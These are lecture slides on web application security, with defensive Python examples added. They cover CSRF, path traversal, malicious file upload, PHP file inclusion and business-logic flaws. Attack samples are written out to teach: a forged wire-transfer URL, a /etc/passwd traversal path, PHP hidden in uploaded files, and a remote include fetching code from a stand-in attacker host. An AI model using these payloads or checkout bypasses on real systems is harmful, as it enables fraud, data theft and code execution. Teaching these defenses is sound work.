Web Security
Cross-Site Request Forgery
Attacks on Servers
28/02/17 Web Security 1
Cross-Site Request Forgery

Cross-Site Request Forgery (CSRF)
• Malicious website has script that redirects and issues a request on target website
  – E.g., document.location = "https://bank.com/wiretransfer.php?amount=10000&recipient=Attacker&account=2567"
• If user is already logged in on target website…
• Request is executed by target website on behalf of user
  – E.g., funds are transferred from the user to the attacker
Login CSRF
• Malicious site includes link or form that logs in victim with attacker's account on CSRF-vulnerable site
• Subsequent victim's interaction with CSRF-vulnerable site is shared with attacker
  – Navigation in vulnerable site
  – Data supplied to vulnerable site
  – …
CSRF Trust Relationship
• Vulnerable site trusts user (login)
• User trusts evil site
• Evil site could be hacked legitimate site
[Diagram: Victim's Browser between Evil Website and CSRF Vulnerable Website, with arrows for Login, Legitimate Request and Malicious Request]
CSRF Server-Side Defenses
• Synchronizer token
  – Random token embedded by server in all HTML forms and verified by server
  – CSRF request rejected because attacker cannot guess token
• Custom HTTP header
  – On login, website sets a cookie containing random value
  – Client-side script reads cookie and copies it into custom HTTP header sent with each transactional request
  – Security based on browser not transmitting custom HTTP headers across different servers
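Both defenses from this slide, modelled in plain Python as an added example (not code from the slides): the session store, cookie and header dicts stand in for a real web framework, and the function names are constructed.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> {"user", "csrf"}
SESSIONS = {}

def login(user):
    """Start a session and mint one random CSRF token for it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid

def render_transfer_form(sid):
    """Synchronizer token: the server embeds the session's token in the form."""
    token = SESSIONS[sid]["csrf"]
    return ('<form method="POST" action="/wiretransfer.php">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="amount"><input name="recipient"></form>')

def handle_wiretransfer(cookies, headers, form):
    """The request must carry the session's token, either as the hidden form field
    (synchronizer token) or as the custom header a same-origin script copied from
    the csrf cookie. A cross-site request arrives with the session cookie attached
    by the browser but with neither, so it is rejected before any funds move."""
    sess = SESSIONS.get(cookies.get("session"))
    if sess is None:
        return 401, "not logged in"
    presented = form.get("csrf_token") or headers.get("X-CSRF-Token")
    # constant-time comparison so a guessing attacker learns nothing from timing
    if presented is None or not hmac.compare_digest(
            presented.encode(), sess["csrf"].encode()):
        return 403, "CSRF token missing or invalid"
    return 200, f"{form['amount']} sent to {form['recipient']} for {sess['user']}"

def demo():
    """Returns the status codes for a form post, a header-protected XHR and a forgery."""
    sid = login("alice")
    # the csrf cookie is readable by the site's own script but not by another origin
    cookies = {"session": sid, "csrf": SESSIONS[sid]["csrf"]}
    token = render_transfer_form(sid).split('value="')[1].split('"')[0]
    form_post = handle_wiretransfer(cookies, {}, {"csrf_token": token, "amount": "10", "recipient": "bob"})
    xhr = handle_wiretransfer(cookies, {"X-CSRF-Token": cookies["csrf"]}, {"amount": "10", "recipient": "bob"})
    # forged cross-site request: cookie attached, but no token and no custom header
    forged = handle_wiretransfer(cookies, {}, {"amount": "10000", "recipient": "Attacker"})
    return form_post[0], xhr[0], forged[0]
```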
Firefox Add-on RequestPolicy (RP)
• RP sets a default-deny policy for cross-site requests
• Cross-site requests are those made to a site different from the current one
• RP allows whitelisting cross-site requests by origin and/or destination site
Improper Path Sanitization
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5. Brown University CS166
Improper Path Sanitization
• Problem: only some paths are valid; which ones?
• Improper path sanitization can lead to disallowed resources being accessed
• What sorts of resources/paths might we want to make off-limits?
  – Configuration files (e.g., Apache's .htaccess)
  – Files outside the web root
  – Files outside the upload directory
  – etc.
Improper Path Sanitization
• Attempt #1: Blacklists
  – e.g., "/foo/bar is off limits"
• What's wrong with this?
  – Multiple paths can refer to the same resource
    – /foo/bar
    – /foo//bar
    – /foo/../foo/bar
    – /foo/bar/baz/..
  – What about paths outside the web root?
    – /../../etc/passwd
    – Becomes /var/www/../../etc/passwd (i.e., /etc/passwd)
Improper Path Sanitization
• Attempt #2: Whitelists
  – e.g., "only /foo/bar or /baz/blah are allowed"
• What's wrong with this?
  – How to keep the whitelist up to date?
  – How to be nice to users
    • e.g., /foo//bar is really /foo/bar
Improper Path Sanitization
• Attempt #3: Parse Paths
  – e.g., determine that foo.com/bar doesn't escape web root
• What's wrong with this?
  – Correct parsing is hard
Improper Path Sanitization
• Solution
  – When possible, use existing implementations
    • Apache does this correctly - use it
  – For custom logic, don't use paths
    • Store data in databases
    • Don't use subfolders
      – e.g., /var/uploads, my-upload.pdf
      – filter bad characters (/, \0) or bad names (.., .)
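The three attempts and the solution, as an added example in Python rather than PHP (not the slides' code): the literal blacklist from Attempt #1 beside a canonicalizing containment check, and the flat-filename filter for the /var/uploads layout. WEB_ROOT, the sample paths and the function names are constructed.

```python
import posixpath

WEB_ROOT = "/var/www"          # constructed web root for the examples below
OFF_LIMITS = {"/foo/bar"}      # Attempt #1: blacklist the literal string

def blacklist_blocks(path):
    """The slide's broken check: a string comparison against the blacklist."""
    return path in OFF_LIMITS

def canonical(path):
    """Collapse '//', '.' and '..' lexically; shows that several spellings
    name one resource, so a blacklist of spellings cannot be complete."""
    return posixpath.normpath(path)

def resolve_within_root(root, requested):
    """Join the request onto root, canonicalize, and require the result to stay
    under root (the root itself is allowed). Returns the path or None.
    Lexical only: symlinks under root would need os.path.realpath on disk."""
    root = posixpath.normpath(root)
    resolved = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    if resolved != root and not resolved.startswith(root + "/"):
        return None               # e.g. /var/www/../../etc/passwd -> /etc/passwd
    return resolved

def safe_upload_name(name):
    """Flat upload directory, as the slide advises: a bare file name with no
    separators or NUL bytes and not '.' or '..'. Returns the name or None."""
    if name in ("", ".", "..") or any(c in name for c in "/\\\x00"):
        return None
    return name
```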
File Upload
File Upload
• Apache's PHP plugin will execute *.php
• What happens if there's an upload directory inside the web root?
  – e.g., /var/www/upload
  • Upload mal.php
  • Visit foo.com/upload/mal.php
  • Profit!
• How to fix?
File Upload
• Attempt #1: Disallow .php extension
• What could go wrong?
  – What if I want to upload a PHP file?
  – Not sufficient for some configurations...
File Upload
  <!-- date.html -->
  <html><head><title>My Page</title></head><body>
  <p>Date: <?php echo date('Y-m-d'); ?></p></body></html>
File Upload
• Upload foo.html:
  <html>
  <?php do_bad_thing(); ?>
  </html>
• How to fix?
File Upload
• Attempt #2: Disallow *.php, *.html
• And verify that it's a properly formatted file
• For example, limit to these file types:
  – JPEG
  – PDF
• What could go wrong?
File Upload
• What could go wrong?
  – JPEG supports comments, so embed PHP in JPEG comment field
  – Even if it didn't, we could still craft the right pixel sequences:
    \x3C\x3F\x70\x68\x70 - <?php
    \x3F\x3E - ?>
• How to fix?
File Upload
• Solution: don't serve files directly
  • Bad: foo.com/upload/foo.pdf
  • Good: foo.com/get.php?file=foo.pdf
• Implement custom logic in get.php
• Don't allow access to upload directory
  – Store outside of web root
  – If that's not possible, use .htaccess or similar
• Watch out for path vulnerabilities, though!
File Inclusion
File Inclusion
• PHP (and other languages) allow dynamic includes
    include('lib.php');
• Imagine a site with dynamically-generated include:
    $lang = $_GET['lang'];
    include($lang . '.php');
• What could go wrong?
File Inclusion
• Let's say there's an add-user.php
  – Only included after authentication as admin
  – Can't load directly - foo.com/add-user.php
• Visit foo.com/blah.php?lang=add-user&user=mallory&pass=l337hax0r
• Makes the include: include('add-user.php');
File Inclusion
• Can we do better?
• Many PHP functions treat paths as being file paths or URLs…
• What could go wrong?
  – foo.com/blah.php?lang=http://mal.com/mal
  • Makes the include: include('http://mal.com/mal.php');
File Inclusion
• Solution
  – If you need to dynamically include files, keep a pre-set list:
    $lang_files = array('en-US' => 'en-us.php', 'en-GB' => 'en-GB.php', 'en-l337' => 'en-l337.php');
Business Logic Flaws
Business Logic Flaws
• "Business logic" is the high-level logic behind a web application's functionality
  – E.g., "A user must pay before having an item shipped to them"
• Flaws in the implementation of this logic (or flaws in the logic itself) can be serious
• Chapter 11 of WAHH
Business Logic Flaws
• Often come from a mismatch between developer assumptions and reality
• Since they differ widely, best to give examples
• These are real examples from real applications
Business Logic Flaws
• Example 1: Cheating on Bulk Discounts
  – Site offers bulk discounts on group of items
  – When a new item is added to the cart, if a bulk discount applies, the prices of all items are lowered appropriately
  – What could go wrong?
    – Add many items to the cart, lowering prices
    – Delete most of them, check out with a cheap item
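Example 1 modelled in Python as an added example (not code from the slides or from the application described): a cart that re-prices only when an item is added, beside one that derives prices from the final contents at checkout. The prices, threshold and class names are constructed.

```python
UNIT_PRICE = 100      # constructed: 10+ items of the group drop to BULK_PRICE each
BULK_THRESHOLD = 10
BULK_PRICE = 60

class VulnerableCart:
    """Developer assumption: the cart only grows once the discount has been applied."""
    def __init__(self):
        self.lines = []   # [sku, price], with the price frozen at add time

    def add(self, sku):
        self.lines.append([sku, UNIT_PRICE])
        if len(self.lines) >= BULK_THRESHOLD:
            for line in self.lines:       # as the slide says: lower every price
                line[1] = BULK_PRICE

    def remove(self, index):
        del self.lines[index]             # nothing is re-priced on removal: the flaw

    def count(self):
        return len(self.lines)

    def checkout_total(self):
        return sum(price for _, price in self.lines)

class FixedCart:
    """Prices are a function of the final contents, computed when they are charged."""
    def __init__(self):
        self.skus = []
    def add(self, sku):
        self.skus.append(sku)
    def remove(self, index):
        del self.skus[index]
    def count(self):
        return len(self.skus)
    def checkout_total(self):
        unit = BULK_PRICE if self.count() >= BULK_THRESHOLD else UNIT_PRICE
        return unit * self.count()

def add_then_remove(cart):
    """The slide's sequence: add enough items to earn the discount, delete all but
    one, and check out. Returns the amount the site would charge."""
    for i in range(BULK_THRESHOLD):
        cart.add(f"widget-{i}")
    while cart.count() > 1:
        cart.remove(0)
    return cart.checkout_total()
```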
Business Logic Flaws
• Example 2: Proceeding to Checkout
  – In a shopping cart application, when checking out, user is directed through a series of pages:
    • From cart, click "checkout" button
    • Redirected to page to enter payment details
    • If payment verifies, redirected to shipping details
    • After shipping details verified, order is complete
  • What could go wrong?
    • Go directly to entering shipping details, skip payment
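Example 2 modelled in Python as an added example (not the slides' code): each checkout page is a method, and the fixed variant consults server-side session state to refuse a step whose predecessor was never completed. The step names, address and class name are constructed.

```python
STEPS = ["cart", "payment", "shipping", "complete"]   # constructed step names

class Checkout:
    """One server-side checkout session. With enforce_order=False each step is just
    a page anyone can request (the flawed application); with enforce_order=True a
    step is served only after the previous one has been recorded as completed."""
    def __init__(self, enforce_order):
        self.enforce_order = enforce_order
        self.completed = set()   # held in the server session, never sent to the client

    def _require_previous(self, step):
        prev = STEPS[STEPS.index(step) - 1]
        if self.enforce_order and prev not in self.completed:
            raise PermissionError(f"{step} requested before {prev} completed")

    def start_checkout(self):
        self.completed.add("cart")

    def submit_payment(self, card_accepted):
        self._require_previous("payment")
        if card_accepted:
            self.completed.add("payment")
        return card_accepted

    def submit_shipping(self, address):
        self._require_previous("shipping")
        self.completed.add("shipping")
        return self.place_order(address)

    def place_order(self, address):
        self._require_previous("complete")
        # the flawed variant happily ships an order that was never paid for
        return {"paid": "payment" in self.completed, "ship_to": address}

def skip_payment_attempt(enforce_order):
    """The slide's bypass: click checkout, then go straight to the shipping page."""
    co = Checkout(enforce_order)
    co.start_checkout()
    try:
        return co.submit_shipping("1 Main St")
    except PermissionError as err:
        return str(err)

def normal_flow(enforce_order):
    """Cart, payment, shipping in order: both variants complete a paid order."""
    co = Checkout(enforce_order)
    co.start_checkout()
    co.submit_payment(card_accepted=True)
    return co.submit_shipping("1 Main St")
```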